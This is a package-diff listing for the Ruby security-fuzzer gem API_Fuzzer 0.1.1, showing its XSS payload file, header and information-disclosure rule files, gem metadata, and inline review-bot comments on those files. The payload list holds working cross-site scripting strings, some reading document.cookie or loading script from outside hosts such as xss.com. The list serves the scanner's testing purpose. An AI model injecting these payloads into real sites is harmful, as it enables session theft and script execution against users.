API_Fuzzer 0.1.1
- checksums.yaml +7 -0
- data/.gitignore +10 -0
- data/.travis.yml +5 -0
- data/API_Fuzzer.gemspec +31 -0
- data/CODE_OF_CONDUCT.md +49 -0
- data/Gemfile +11 -0
- data/LICENSE.txt +21 -0
- data/README.md +91 -0
- data/Rakefile +10 -0
- data/app/controllers/ping_controller.rb +22 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/config/routes.rb +4 -0
- data/lib/API_Fuzzer.rb +43 -0
- data/lib/API_Fuzzer/csrf_check.rb +41 -0
- data/lib/API_Fuzzer/engine.rb +5 -0
- data/lib/API_Fuzzer/error.rb +11 -0
- data/lib/API_Fuzzer/header_info.rb +50 -0
- data/lib/API_Fuzzer/idor_check.rb +62 -0
- data/lib/API_Fuzzer/privilege_escalation_check.rb +78 -0
- data/lib/API_Fuzzer/rate_limit_check.rb +69 -0
- data/lib/API_Fuzzer/redirect_check.rb +106 -0
- data/lib/API_Fuzzer/request.rb +69 -0
- data/lib/API_Fuzzer/resource_info.rb +51 -0
- data/lib/API_Fuzzer/sql_blind_check.rb +52 -0
- data/lib/API_Fuzzer/sql_check.rb +156 -0
- data/lib/API_Fuzzer/version.rb +3 -0
- data/lib/API_Fuzzer/vulnerability.rb +14 -0
- data/lib/API_Fuzzer/xss_check.rb +92 -0
- data/lib/API_Fuzzer/xxe_check.rb +47 -0
- data/payloads/blind_sql.txt +3 -0
- data/payloads/detect/sql.txt +89 -0
- data/payloads/sql.txt +196 -0
- data/payloads/xss.txt +58 -0
- data/rules/headers.yml +17 -0
- data/rules/info.yml +21 -0
- metadata +163 -0
data/payloads/xss.txt
ADDED
@@ -0,0 +1,58 @@
|
|
1
|
+
' onmouseover=alert(/Black.Spook/)
|
2
|
+
";eval(unescape(location))//# %0Aalert(0)
|
3
|
+
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
4
|
+
"><iframe%20src="http://google.com"%%203E
|
5
|
+
"><img src=x onerror=prompt(1);>
|
6
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
7
|
+
<SCRIPT SRC=//xss.rocks/.j>
|
8
|
+
'); alert('XSS
|
9
|
+
"><script>alert(1)</script>
|
10
|
+
\";alert('XSS');//
|
11
|
+
<%<!--'%><script>alert(1);</script -->
|
12
|
+
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
|
13
|
+
<--`<img/src=` onerror=alert(1)> --!>
|
14
|
+
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
15
|
+
<<scr\0ipt/src=http://xss.com/xss.js></script
|
16
|
+
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
17
|
+
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
18
|
+
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
19
|
+
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
20
|
+
<a href="javascript:\u0061le%72t(1)"><button>
|
21
|
+
<a href="jAvAsCrIpT:alert(1)">X</a>
|
22
|
+
<a href=javascript:alert(document.cookie)>Click Here</a>
|
23
|
+
<a onmouseover="alert(document.cookie)">xxs link</a>
|
24
|
+
<a onmouseover=alert(document.cookie)>xxs link</a>
|
25
|
+
<iframe/onreadystatechange=alert(1)
|
26
|
+
<iframe/src \/\/onload = prompt(1)
|
27
|
+
<IMG DYNSRC=\"javascript:alert('XSS')\">
|
28
|
+
<IMG onmouseover="alert('xxs')">
|
29
|
+
<img src ?itworksonchrome?\/onerror = alert(1)???
|
30
|
+
<IMG SRC= onmouseover="alert('xxs')">
|
31
|
+
<IMG SRC="  javascript:alert('XSS');">
|
32
|
+
<img src="/" =_=" title="onerror='prompt(1)'">
|
33
|
+
<IMG SRC="jav	ascript:alert('XSS');">
|
34
|
+
<IMG SRC="jav&#x09;ascript:alert('XSS');">
|
35
|
+
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
|
36
|
+
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
37
|
+
<IMG SRC="javascript:alert('XSS')"
|
38
|
+
<img src="javascript:alert('XSS')">
|
39
|
+
<IMG SRC=javascript:alert('XSS')>
|
40
|
+
<IMG SRC=javascript:alert('XSS')>
|
41
|
+
<img src=`xx:xx`onerror=alert(1)>
|
42
|
+
<svg contentScriptType=text/vbs><script>MsgBox+1
|
43
|
+
<svg/onload=alert(1)
|
44
|
+
<svg><script ?>alert(1)
|
45
|
+
<svg><script onlypossibleinopera:-)> alert(1)
|
46
|
+
<svg><script>//
confirm(1);</script </svg>
|
47
|
+
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
|
48
|
+
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
|
49
|
+
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
50
|
+
<var onmouseover="prompt(1)">On Mouse Over</var>?
|
51
|
+
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
52
|
+
http://www.<script>alert(1)</script .com
|
53
|
+
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
54
|
+
javascript:alert%28/xss/%29
|
55
|
+
javascript:alert(1)
|
56
|
+
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
57
|
+
x”</title><img src%3dx onerror%3dalert(1)>
|
58
|
+
[[#%3Cscript%3Ealert(1)%3C/script%3E|
|
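Review bot: Entries 39 and 40 of the payload list are identical (`<IMG SRC=javascript:alert('XSS')>`), and entries 51 and 53 are not payloads but URLs pointing at a fuzzdb test file, so a loader that sends each line verbatim will issue one duplicate request and two requests carrying a bare URL that is unlikely to tell the checker anything; dropping lines 40, 51 and 53 removes that noise. Entry 46 is rendered as two physical lines (`<svg><script>//` followed by `confirm(1);</script </svg>`), which suggests a line break embedded in a single entry; if the consumer reads this file line by line the entry will arrive as two fragments, which is worth confirming against the loader in lib/API_Fuzzer/xss_check.rb, outside this section. The file has no format comment and no comment syntax, so the expected line format (one payload per line, sent as-is) should be documented in README.md rather than in the file itself.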
data/rules/headers.yml
ADDED
@@ -0,0 +1,17 @@
|
|
1
|
+
---
|
2
|
+
rules:
|
3
|
+
|
4
|
+
-
|
5
|
+
description: X-XSS Protection Header is not set properly
|
6
|
+
name: x-xss-protection
|
7
|
+
match: \A[01](; mode=block)?(; report=.*)?\z
|
8
|
+
|
9
|
+
-
|
10
|
+
description: Possible Clickjacking Vulnerability
|
11
|
+
name: x-frame-options
|
12
|
+
match: \A(SAMEORIGIN\z|DENY\z)
|
13
|
+
|
14
|
+
-
|
15
|
+
description: HSTS protection is not enabled in service
|
16
|
+
name: strict-transport-security
|
17
|
+
match: \Amax-age=\d+(; includeSubdomains)?(; preload)?\z
|
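Review bot: The strict-transport-security pattern on line 17, `\Amax-age=\d+(; includeSubdomains)?(; preload)?\z`, accepts `max-age=0`, which is the value a server sends to switch HSTS off, so a disabled policy passes this rule; requiring a non-zero value, `match: \Amax-age=[1-9]\d*(; includeSubdomains)?(; preload)?\z`, closes that gap. The same pattern rejects the spelling `includeSubDomains` used in the HSTS specification (directive names are case-insensitive there) and any extra whitespace around the `;`, unless the code that applies these rules matches case-insensitively — that code is not in this section, so worth confirming before tightening the regex further. The x-xss-protection pattern on line 7 likewise treats `0` (filter disabled) the same as `1`; if the intent stated in the description, `X-XSS Protection Header is not set properly`, is to flag a disabled filter, the leading character class should be `1` rather than `[01]`, and the choice either way deserves a one-line comment above the rule.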
data/rules/info.yml
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
---
|
2
|
+
rules:
|
3
|
+
|
4
|
+
-
|
5
|
+
#Server
|
6
|
+
description: Information Disclosure of Server version
|
7
|
+
match: server
|
8
|
+
-
|
9
|
+
# Powered-by Header
|
10
|
+
description: Information Disclosure through x-powered-by
|
11
|
+
match: x-powered-by
|
12
|
+
|
13
|
+
-
|
14
|
+
# ASP.NET MVC version
|
15
|
+
description: Information Disclosure of APS.NET MVC version
|
16
|
+
match: x-aspnetmvc-version
|
17
|
+
|
18
|
+
-
|
19
|
+
# ASP.NET version
|
20
|
+
description: Information Disclosure of ASP.NET version
|
21
|
+
match: x-aspnet-version
|
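Review bot: The description on line 15 misspells the product name as `APS.NET`; it should read `description: Information Disclosure of ASP.NET version`, consistent with line 20. Each entry in this file also omits the `name:` key that every rule in rules/headers.yml carries and instead puts the header name in `match:`; if one loader reads both files, that difference should be documented with a comment at the top of this file, e.g. `# match: holds the response header name to report on (whether comparison is case-insensitive depends on the loader — confirm)`. The comment style is also mixed (`#Server` on line 5 versus `# Powered-by Header` on line 9); a space after `#` throughout keeps the file uniform.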
metadata
ADDED
@@ -0,0 +1,163 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: API_Fuzzer
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 0.1.1
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- Lalith Rallabhandi
|
8
|
+
autorequire:
|
9
|
+
bindir: exe
|
10
|
+
cert_chain: []
|
11
|
+
date: 2016-10-14 00:00:00.000000000 Z
|
12
|
+
dependencies:
|
13
|
+
- !ruby/object:Gem::Dependency
|
14
|
+
name: http
|
15
|
+
requirement: !ruby/object:Gem::Requirement
|
16
|
+
requirements:
|
17
|
+
- - ~>
|
18
|
+
- !ruby/object:Gem::Version
|
19
|
+
version: '2.0'
|
20
|
+
type: :runtime
|
21
|
+
prerelease: false
|
22
|
+
version_requirements: !ruby/object:Gem::Requirement
|
23
|
+
requirements:
|
24
|
+
- - ~>
|
25
|
+
- !ruby/object:Gem::Version
|
26
|
+
version: '2.0'
|
27
|
+
- !ruby/object:Gem::Dependency
|
28
|
+
name: activesupport
|
29
|
+
requirement: !ruby/object:Gem::Requirement
|
30
|
+
requirements:
|
31
|
+
- - '>='
|
32
|
+
- !ruby/object:Gem::Version
|
33
|
+
version: '0'
|
34
|
+
type: :runtime
|
35
|
+
prerelease: false
|
36
|
+
version_requirements: !ruby/object:Gem::Requirement
|
37
|
+
requirements:
|
38
|
+
- - '>='
|
39
|
+
- !ruby/object:Gem::Version
|
40
|
+
version: '0'
|
41
|
+
- !ruby/object:Gem::Dependency
|
42
|
+
name: rails
|
43
|
+
requirement: !ruby/object:Gem::Requirement
|
44
|
+
requirements:
|
45
|
+
- - '>='
|
46
|
+
- !ruby/object:Gem::Version
|
47
|
+
version: '4.2'
|
48
|
+
type: :runtime
|
49
|
+
prerelease: false
|
50
|
+
version_requirements: !ruby/object:Gem::Requirement
|
51
|
+
requirements:
|
52
|
+
- - '>='
|
53
|
+
- !ruby/object:Gem::Version
|
54
|
+
version: '4.2'
|
55
|
+
- !ruby/object:Gem::Dependency
|
56
|
+
name: bundler
|
57
|
+
requirement: !ruby/object:Gem::Requirement
|
58
|
+
requirements:
|
59
|
+
- - ~>
|
60
|
+
- !ruby/object:Gem::Version
|
61
|
+
version: '1.12'
|
62
|
+
type: :development
|
63
|
+
prerelease: false
|
64
|
+
version_requirements: !ruby/object:Gem::Requirement
|
65
|
+
requirements:
|
66
|
+
- - ~>
|
67
|
+
- !ruby/object:Gem::Version
|
68
|
+
version: '1.12'
|
69
|
+
- !ruby/object:Gem::Dependency
|
70
|
+
name: rake
|
71
|
+
requirement: !ruby/object:Gem::Requirement
|
72
|
+
requirements:
|
73
|
+
- - ~>
|
74
|
+
- !ruby/object:Gem::Version
|
75
|
+
version: '10.0'
|
76
|
+
type: :development
|
77
|
+
prerelease: false
|
78
|
+
version_requirements: !ruby/object:Gem::Requirement
|
79
|
+
requirements:
|
80
|
+
- - ~>
|
81
|
+
- !ruby/object:Gem::Version
|
82
|
+
version: '10.0'
|
83
|
+
- !ruby/object:Gem::Dependency
|
84
|
+
name: minitest
|
85
|
+
requirement: !ruby/object:Gem::Requirement
|
86
|
+
requirements:
|
87
|
+
- - ~>
|
88
|
+
- !ruby/object:Gem::Version
|
89
|
+
version: '5.0'
|
90
|
+
type: :development
|
91
|
+
prerelease: false
|
92
|
+
version_requirements: !ruby/object:Gem::Requirement
|
93
|
+
requirements:
|
94
|
+
- - ~>
|
95
|
+
- !ruby/object:Gem::Version
|
96
|
+
version: '5.0'
|
97
|
+
description: APIFuzzer gem builds api for finding security issues through a fuzzer
|
98
|
+
email:
|
99
|
+
- lalithr95@gmail.com
|
100
|
+
executables: []
|
101
|
+
extensions: []
|
102
|
+
extra_rdoc_files: []
|
103
|
+
files:
|
104
|
+
- .gitignore
|
105
|
+
- .travis.yml
|
106
|
+
- API_Fuzzer.gemspec
|
107
|
+
- CODE_OF_CONDUCT.md
|
108
|
+
- Gemfile
|
109
|
+
- LICENSE.txt
|
110
|
+
- README.md
|
111
|
+
- Rakefile
|
112
|
+
- app/controllers/ping_controller.rb
|
113
|
+
- bin/console
|
114
|
+
- bin/setup
|
115
|
+
- config/routes.rb
|
116
|
+
- lib/API_Fuzzer.rb
|
117
|
+
- lib/API_Fuzzer/csrf_check.rb
|
118
|
+
- lib/API_Fuzzer/engine.rb
|
119
|
+
- lib/API_Fuzzer/error.rb
|
120
|
+
- lib/API_Fuzzer/header_info.rb
|
121
|
+
- lib/API_Fuzzer/idor_check.rb
|
122
|
+
- lib/API_Fuzzer/privilege_escalation_check.rb
|
123
|
+
- lib/API_Fuzzer/rate_limit_check.rb
|
124
|
+
- lib/API_Fuzzer/redirect_check.rb
|
125
|
+
- lib/API_Fuzzer/request.rb
|
126
|
+
- lib/API_Fuzzer/resource_info.rb
|
127
|
+
- lib/API_Fuzzer/sql_blind_check.rb
|
128
|
+
- lib/API_Fuzzer/sql_check.rb
|
129
|
+
- lib/API_Fuzzer/version.rb
|
130
|
+
- lib/API_Fuzzer/vulnerability.rb
|
131
|
+
- lib/API_Fuzzer/xss_check.rb
|
132
|
+
- lib/API_Fuzzer/xxe_check.rb
|
133
|
+
- payloads/blind_sql.txt
|
134
|
+
- payloads/detect/sql.txt
|
135
|
+
- payloads/sql.txt
|
136
|
+
- payloads/xss.txt
|
137
|
+
- rules/headers.yml
|
138
|
+
- rules/info.yml
|
139
|
+
homepage: https://github.com/lalithr95/API-Fuzzer
|
140
|
+
licenses:
|
141
|
+
- MIT
|
142
|
+
metadata: {}
|
143
|
+
post_install_message:
|
144
|
+
rdoc_options: []
|
145
|
+
require_paths:
|
146
|
+
- lib
|
147
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
148
|
+
requirements:
|
149
|
+
- - '>='
|
150
|
+
- !ruby/object:Gem::Version
|
151
|
+
version: '0'
|
152
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
153
|
+
requirements:
|
154
|
+
- - '>='
|
155
|
+
- !ruby/object:Gem::Version
|
156
|
+
version: '0'
|
157
|
+
requirements: []
|
158
|
+
rubyforge_project:
|
159
|
+
rubygems_version: 2.6.6
|
160
|
+
signing_key:
|
161
|
+
specification_version: 4
|
162
|
+
summary: APIFuzzer gem builds api for finding security issues through a fuzzer
|
163
|
+
test_files: []
|